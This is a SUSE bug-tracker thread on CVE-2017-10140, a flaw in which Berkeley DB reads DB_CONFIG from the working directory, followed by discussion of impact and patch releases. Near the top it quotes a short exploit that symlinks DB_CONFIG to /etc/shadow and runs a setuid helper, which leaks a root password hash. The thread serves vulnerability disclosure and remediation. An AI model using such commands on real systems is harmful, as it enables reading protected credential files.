Bugzilla – Bug 1043886
VUL-0: CVE-2017-10140: libdb-4_5,libdb-4_8: Berkeley DB reads DB_CONFIG from cwd
Last modified: 2018-02-22 11:09:12 UTC
OSS:2017/Q2/452 From: Jakub Wilk Apparently Berkeley DB reads the DB_CONFIG configuration file from the current working directory by default[*]. This is surprising and AFAICT undocumented. Here's how to exploit it against pam_ccreds: $ cat /etc/shadow cat: /etc/shadow: Permission denied $ ln -sf /etc/shadow DB_CONFIG $ /sbin/ccreds_chkpwd moo < /dev/null BDB1584 line 1: root:$1$QRCEVRMX$sPppjXE42AZnUPuEWf87D.:17327:0:99999:7:::: incorrect name-value pair References: http://seclists.org/oss-sec/2017/q2/452
so this needs a suited vector to be a problem, but it's a pretty common component, so that's probably not hard to find.
It seems we are not affected by this exploit since we are not shipping /sbin/ccreds_chkpwd. The source of this program comes with the package pam_ccred but it is not installed (maybe because it requires the setuid attribute). Note that the exploit works only in distributions which install ccreds_chkpwd.
AFAIU /sbin/ccreds_chkpwd is only used as an example for a suid root program that is linked against libdb. But the actual bug is in libdb and thus every suid root binary that used libdb could be used to exploit it.
The patch mentioned in http://seclists.org/oss-sec/2017/q2/479 seems to fix the problem but it might break other things. I'll try to dig more.
(In reply to Reinhard Max from comment #4) yes, that is correct
SUSE-SU-2018:0409-1: An update that contains security fixes can now be installed. Category: security (moderate) Bug References: 1043886 CVE References: Sources used: SUSE Studio Onsite 1.3 (src): libdb-4_5-4.5.20-97.5 SUSE Linux Enterprise Software Development Kit 11-SP4 (src): libdb-4_5-4.5.20-97.5, libdb_java-4_5-4.5.20-97.7 SUSE Linux Enterprise Server 11-SP4 (src): libdb-4_5-4.5.20-97.5 SUSE Linux Enterprise Debuginfo 11-SP4 (src): libdb-4_5-4.5.20-97.5, libdb_java-4_5-4.5.20-97.7
SUSE-SU-2018:0510-1: An update that contains security fixes can now be installed. Category: security (moderate) Bug References: 1043886 CVE References: Sources used: SUSE Linux Enterprise Software Development Kit 12-SP3 (src): libdb-4_8-4.8.30-29.6 SUSE Linux Enterprise Software Development Kit 12-SP2 (src): libdb-4_8-4.8.30-29.6 SUSE Linux Enterprise Server for Raspberry Pi 12-SP2 (src): libdb-4_8-4.8.30-29.6 SUSE Linux Enterprise Server 12-SP3 (src): libdb-4_8-4.8.30-29.6 SUSE Linux Enterprise Server 12-SP2 (src): libdb-4_8-4.8.30-29.6 SUSE Linux Enterprise Desktop 12-SP3 (src): libdb-4_8-4.8.30-29.6 SUSE Linux Enterprise Desktop 12-SP2 (src): libdb-4_8-4.8.30-29.6 SUSE CaaS Platform ALL (src): libdb-4_8-4.8.30-29.6 OpenStack Cloud Magnum Orchestration 7 (src): libdb-4_8-4.8.30-29.6
You forgot openSUSE:Leap:42.3:Update/libdb-4_5
submitted missing to Leap 42.3. Asked for it to be dropped from the SLE 15 codestream and not be included in Leap 15.0
This is an autogenerated message for OBS integration: This bug (1043886) was mentioned in https://build.opensuse.org/request/show/578815 42.3 / libdb-4_5
releasing for Leap, done
openSUSE-SU-2018:0519-1: An update that contains security fixes can now be installed. Category: security (moderate) Bug References: 1043886 CVE References: Sources used: openSUSE Leap 42.3 (src): libdb-4_5-4.5.20-135.3.1, libdb_java-4_5-4.5.20-135.3.1
openSUSE-SU-2018:0520-1: An update that contains security fixes can now be installed. Category: security (moderate) Bug References: 1043886 CVE References: Sources used: openSUSE Leap 42.3 (src): libdb-4_8-4.8.30-34.3.1, libdb_java-4_8-4.8.30-34.3.1